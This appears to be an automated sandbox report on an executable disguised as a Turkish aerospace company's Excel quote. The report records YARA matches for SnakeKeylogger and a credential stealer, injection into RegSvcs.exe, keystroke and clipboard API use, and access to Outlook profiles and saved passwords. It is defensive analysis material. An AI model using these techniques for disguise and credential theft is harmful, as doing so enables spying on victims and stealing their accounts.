Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_01013F66: OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_0100001C: GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_0102CABC: DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_00FA3B3A: This is a third-party compiled AutoIt script.
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000000.1472217423.0000000001054000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_9c41c4a5-8)
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000000.1472217423.0000000001054000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_3407b881-6)
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_92b48fec-3)
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_df0f59d9-d)
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_0100A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_00FF8310: _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_010051BD: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: String function 00FC0AE3 appears 70 times
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: String function 00FC8900 appears 42 times
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: String function 00FA7DE1 appears 35 times
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003B63000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1480527876.0000000003D0D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, VIPSeassion.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_0100A06A: GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_00FF81CB: AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_00FF87E1: LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_0100B333: SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_0101EE0D: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_0100C397: CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_00FA4E89: CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | File created: C:\Users\user\AppData\Local\Temp\aut76C8.tmp
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000029BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
